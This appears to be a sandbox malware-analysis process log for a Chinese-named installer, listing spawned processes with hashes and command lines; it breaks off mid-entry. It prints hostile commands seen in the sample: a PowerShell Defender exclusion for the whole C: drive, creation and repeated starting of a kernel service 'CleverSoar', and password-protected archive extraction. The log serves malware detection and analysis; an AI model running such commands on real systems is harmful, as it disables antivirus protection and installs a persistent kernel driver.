                            Reputation:low
                            Has exited:true

                            General

                            Target ID:6
                            Start time:07:13:04
                            Start date:24/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe"
                            Imagebase:0xcf0000
                            File size:3'366'912 bytes
                            MD5 hash:4E9D08C44F409F54940837360055C5AF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:7
                            Start time:07:13:04
                            Start date:24/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff741d30000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:07:13:04
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:9
                            Start time:07:13:07
                            Start date:24/12/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                            Imagebase:0x7ff7b4ee0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:10
                            Start time:07:13:13
                            Start date:24/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
                            Imagebase:0xd30000
                            File size:7'064'515 bytes
                            MD5 hash:87A72F4BE35EFF0B33E71D38146067B6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            General

                            Target ID:11
                            Start time:07:13:14
                            Start date:24/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user~1\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$10448,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
                            Imagebase:0xa10000
                            File size:3'366'912 bytes
                            MD5 hash:4E9D08C44F409F54940837360055C5AF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            General

                            Target ID:12
                            Start time:07:13:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff7fb730000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:14
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:15
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0xa70000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            General

                            Target ID:18
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:19
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0xa70000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:20
                            Start time:07:13:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:24
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:25
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:26
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:27
                            Start time:07:13:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:28
                            Start time:07:13:20
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:29
                            Start time:07:13:20
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:30
                            Start time:07:13:20
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:31
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:32
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:33
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:34
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:35
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:36
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:37
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:38
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:39
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:40
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:41
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:42
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:43
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:44
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:45
                            Start time:07:13:21
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:46
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:47
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:48
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:49
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:50
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:51
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:52
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:53
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:54
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:55
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:56
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:57
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:58
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:59
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:60
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:61
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:62
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:63
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:64
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:65
                            Start time:07:13:22
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:66
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6b71c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:67
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:68
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:69
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:70
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7c40e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:71
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:72
                            Start time:07:13:23
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff70f4c0000
                            File size:289'792 bytes
